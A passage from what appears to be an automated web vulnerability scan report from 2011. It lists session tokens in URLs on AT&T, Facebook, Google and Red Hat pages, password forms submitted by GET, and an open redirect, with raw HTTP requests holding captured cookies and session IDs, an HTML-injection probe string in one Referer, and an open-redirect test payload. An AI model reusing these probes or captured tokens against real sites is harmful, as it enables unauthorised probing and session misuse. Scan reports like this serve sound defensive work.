high&wt_aka_bw=5000&wt_aka_asnum=36351&wt_aka_location_id=0&wt_DMA_Name=San%20Francisco-San%20Jose%20Area&wtDealerCode=Z0066&wtFSRcodePresent=6.3.0_015A HTTP/1.1
Host: wls.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; bn_u=6923670900791695274; ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMzU5MjYyNDcyMC4zMDE2ODQzMAAAAAAAAAABAAAAAgAAAKpgSU6jYElOAQAAAAEAAACqYElOo2BJTgEAAAACAAAAITUwLjIzLjEyMy4xMDYtMzU5MjYyNDcyMC4zMDE2ODQzMA--; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.1.10.1313431966; TLTHID=334FB54EC76B10C7B47BF82B0BF36CDD; TLTSID=31A640C8C76B10C7A09DCAEB2DFC8A0E; fsr.a=1313432465833; wtAka=y

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 19:00:42 GMT
Accept-Ranges: bytes
ETag: "02926e7ea60c71:c87"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMzU5MjYyNDcyMC4zMDE2ODQzMAAAAAAAAAABAAAAAgAAAJ5iSU6jYElOAQAAAAEAAACeYklOo2BJTgEAAAACAAAAITUwLjIzLjEyMy4xMDYtMzU5MjYyNDcyMC4zMDE2ODQzMA--; path=/; expires=Thu, 12-Aug-2021 18:17:02 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Mon, 15 Aug 2011 18:17:01 GMT
Connection: close

GIF89a.............!.......,...........D..;

5.8. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=108503912579284&app_id=108503912579284&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df172165908%26origin%3Dhttp%253A%252F%252Fviral.lionsgate.com%252Ff1f34393a8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=0&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1416d0dc%26origin%3Dhttp%253A%252F%252Fviral.lionsgate.com%252Ff1f34393a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd507147%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b846cdbc%26origin%3Dhttp%253A%252F%252Fviral.lionsgate.com%252Ff1f34393a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd507147&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df4c0ff41%26origin%3Dhttp%253A%252F%252Fviral.lionsgate.com%252Ff1f34393a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd507147&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df379b0b22c%26origin%3Dhttp%253A%252F%252Fviral.lionsgate.com%252Ff1f34393a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd507147&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://viral.lionsgate.com/conanthebarbarian/facebook/game/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dapp_108503912579284; wd=1123x954

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.22.57
X-Cnection: close
Date: Mon, 15 Aug 2011 18:25:38 GMT
Content-Length: 247

<script type="text/javascript">
parent.postMessage("cb=f4c0ff41&origin=http\u00253A\u00252F\u00252Fviral.lionsgate.com\u00252Ff1f34393a8&relation=parent&transport=postmessage&frame=fd507147", "http:\/
...[SNIP]...

5.9. http://www.google.com/recaptcha/api/challenge  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.google.com
Path:   /recaptcha/api/challenge

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /recaptcha/api/challenge?k=6LfDxsYSAAAAAGGLBGaRurawNnbvAGQw5UwRWYXL&ajax=1&xcachestop=0.5170781947672367&authp=nonce.tt.time.new_audio_default&psig=6SS-NWc821W-RgFd6E4FWf4Kok8&nonce=KrCCF9r-90AbIC04R7PaDQ&tt=LGGjVHt-4R8eLqAd5PTXoCpFeIM&time=1313433562&new_audio_default=1 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=69580f9920d5f494:U=02e48c2870b7e459:FF=0:TM=1310132119:LM=1310132498:S=QbWdR-loyTGm4ljm; NID=49=SeqENWDJp1RhQynOGuaP5MaEDdFIEWzZKNfyzN11QVNUFV6g57NKp2RhvR_8p-q-LzBn5EkmLpuOPnz6NlRmKJ-efD6HvcO3-ab2X1zJIi23BmyRIfNPcRAplfZ_7qJ7

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Mon, 15 Aug 2011 18:39:25 GMT
Content-Type: text/javascript
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 492
Server: GSE


var RecaptchaState = {
site : '6LfDxsYSAAAAAGGLBGaRurawNnbvAGQw5UwRWYXL',
challenge : '03AHJ_Vuu8_Bw-2q6DqOZHVhZfYn4zvD3oLhAtPknYtvE6Go7aJXLrLOc_8fX8AZSPjUEMgJm6I5bZ2Dk5MS9DeRHFM-Pcp4n-HuM-Fz
...[SNIP]...

5.10. https://www.redhat.com/wapps/ugc/register.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.redhat.com
Path:   /wapps/ugc/register.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /wapps/ugc/register.html;jsessionid=i3aaZtOnOMF4S30iWROsiQ**.4b748952?_flowExecutionKey=_cF7B3B892-4CEE-2290-D8A6-E69E0CDC508B_kC88A76EF-152B-F83F-175E-9854DABB8DB9 HTTP/1.1
Host: www.redhat.com
Connection: keep-alive
Referer: https://www.redhat.com/wapps/sso/login.html?redirect=%2Fwapps%2Fstore%2Fprotected%2Fpurchase.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=i3aaZtOnOMF4S30iWROsiQ**.4b748952; rh_omni_tc=70160000000H4AjAAK; s_ria=flash%2010%7Csilverlight%204.0; s_vnum=1316027200761%26vn%3D1; s_vi=[CS]v1|2724B704851D0F89-60000130E007A637[CE]; www-session-id=8ccce98baea8ecd121b0a86afe4a630d; rh_store=ver%3D1.4%3Bline%3DRH0844913%3A1%3Astrue%3Ad1313435219589%3Ad1344971219589%3A-1%3Acnull%3Afalse%3Anull; s_cc=true; s_nr=1313435299756; s_invisit=true; s_sq=redhatglobal%2Credhatcom%3D%2526pid%253Dhttps%25253A//www.redhat.com/wapps/sso/login.html%25253Fredirect%25253D%2525252Fwapps%2525252Fstore%2525252Fprotected%2525252Fpurchase.html%2526oid%253Dhttps%25253A//www.redhat.com/wapps/ugc/register.html%25253Fredirect%25253D/wapps/store/protected/purchase.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 27384
Expires: Mon, 15 Aug 2011 19:07:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 19:07:26 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>redhat.
...[SNIP]...

5.11. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/free-packages.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.1.10.1313431966

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 135031
Expires: Mon, 15 Aug 2011 18:20:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:04 GMT
Connection: close
Set-Cookie: TLTHID=31FEFBDCC76B10C7BCD0FCE33BDE3340; Path=/; Domain=.att.com


                                                                                                                           
...[SNIP]...
<p>-->
<a href='https://sales.liveperson.net/hc/76226072/?cmd=file&amp;file=visitorWantsToChat&amp;site=76226072&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=cingular' target='chat76226072'>
   <img id='hcDynamicIcon' name='hcDynamicIcon' src='/cell-phone-service/livePerson/chat_deployment_global/cingular/images/noscript_button/reponline.gif' alt='Live Chat' border='0' />
...[SNIP]...

5.12. http://www.wireless.att.com/cell-phone-service/packages/netbook-packages.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/netbook-packages.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /cell-phone-service/packages/netbook-packages.jsp HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O90d55%3E%3Ca%20b%3dc%3E17435fcd4f5
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.4.10.1313431966; TLTHID=9C4648E2C76B10C7B846FFAD8CC90BB7; TLTSID=9C4648E2C76B10C7B846FFAD8CC90BB7; BIGipServerpWL_7010_7011=2060571015.25115.0000; fsr.a=1313432642829; wtAka=y

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 91395
Expires: Mon, 15 Aug 2011 18:23:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:23:08 GMT
Connection: close
Set-Cookie: TLTHID=A01F50D0C76B10C7BEB5A17F0D25FB73; Path=/; Domain=.att.com


                                                                           
...[SNIP]...
<p>-->
<a href='https://sales.liveperson.net/hc/76226072/?cmd=file&amp;file=visitorWantsToChat&amp;site=76226072&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=cingular' target='chat76226072'>
   <img id='hcDynamicIcon' name='hcDynamicIcon' src='/cell-phone-service/livePerson/chat_deployment_global/cingular/images/noscript_button/reponline.gif' alt='Live Chat' border='0' />
...[SNIP]...

5.13. http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/windows-packages.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /cell-phone-service/packages/windows-packages.jsp HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.2.10.1313431966; TLTHID=334FB54EC76B10C7B47BF82B0BF36CDD; TLTSID=31A640C8C76B10C7A09DCAEB2DFC8A0E; B2CSESSIONID=1fKdTJjTTvqPt1!1142544054; DYN_USER_ID=4148005476; DYN_USER_CONFIRM=d958665c301d296eb3ee49e91430ee35; BIGipServerpWL_7010_7011=3989950855.25115.0000; wtAka=y; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001693504923%22%2C%22poc_login%22%3A%22no%22%2C%22bus_support%22%3A%22no%22%2C%22ufix%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22015A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221313432472549_500300%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Ffree-packages.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d9%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A9%2C%22sd%22%3A9%7D; __utmc=241758596; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Ffree-packages.jsp%22%2C%22r%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22t%22%3A1313432484011%2C%22u%22%3A%226923670900791695274%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Fwindows-packages.jsp%22%2C%22l%22%3A%22Windows%C2%AE%20Packages%22%2C%22de%22%3A%7B%22su%22%3A%22Find%20great%20free%20Phone%20deals%20and%20packages%20at%20AT%26T%20that%20can%20help%20save%20you%20money%20at%20AT%26T.%20Wireless%20from%20AT%26T.%20Wireless%20from%20AT%26T.%22%2C%22ti%22%3A%22Free%20Phone%20Deals%20and%20Packages%20-%20Shop%20-%20Wireless%20from%20AT%26T%22%2C%22nw%22%3A1812%2C%22nl%22%3A185%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 103697
Expires: Mon, 15 Aug 2011 18:20:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:32 GMT
Connection: close
Set-Cookie: TLTHID=43172EBCC76B10C7CFD7C47F0B9E96D6; Path=/; Domain=.att.com


                                                                       
...[SNIP]...
<p>-->
<a href='https://sales.liveperson.net/hc/76226072/?cmd=file&amp;file=visitorWantsToChat&amp;site=76226072&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=cingular' target='chat76226072'>
   <img id='hcDynamicIcon' name='hcDynamicIcon' src='/cell-phone-service/livePerson/chat_deployment_global/cingular/images/noscript_button/reponline.gif' alt='Live Chat' border='0' />
...[SNIP]...

6. Password field submitted using GET method  previous  next
There are 2 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


6.1. http://www.ask.com/settings  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ask.com
Path:   /settings

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Request

GET /settings HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllNwpcQDgAACSmEQcAAADE
from-tr: trafrt008iad.io.askjeeves.info
Cache-Control: no-cache
Content-Length: 65232
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:07 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:07 GMT; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
</div>
<form name="myForm2" id="myForm2">
<div id="passsuccessmsg">
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="currentpassword" id="currentpassword" value=""></div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="newpassword" id="newpassword" value=""> </div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="password" id="password" value=""> </div>
...[SNIP]...

6.2. http://xhamster.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://xhamster.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET / HTTP/1.1
Host: xhamster.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:04:10 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Srv: m5
Set-Cookie: adNum=387; path=/
Vary: Accept-Encoding
Content-Length: 59237

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>xHamster's Free Porn Videos</title>
<meta name="description" content="xH
...[SNIP]...
</div>
<form id='loginForm'>
<table cellpadding="0" cellspacing="0" style="display: table;">
...[SNIP]...
<td><input type='password' class='inp' name="password" id='password'></td>
...[SNIP]...

7. Open redirection  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://streamate.doublepimp.com
Path:   /r.poptracking

Issue detail

The value of the qsurl request parameter is used to perform an HTTP redirect. The payload http%3a//accedad66c3140087/a%3fhttp%3a//www.xhamstercams.com/exports/golive/%3fAFNO%3d1-0-624213-344279%26UHNSMTY%3d458%26DF%3d0%26lp%3d3 was submitted in the qsurl parameter. This caused a redirection to the following URL:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

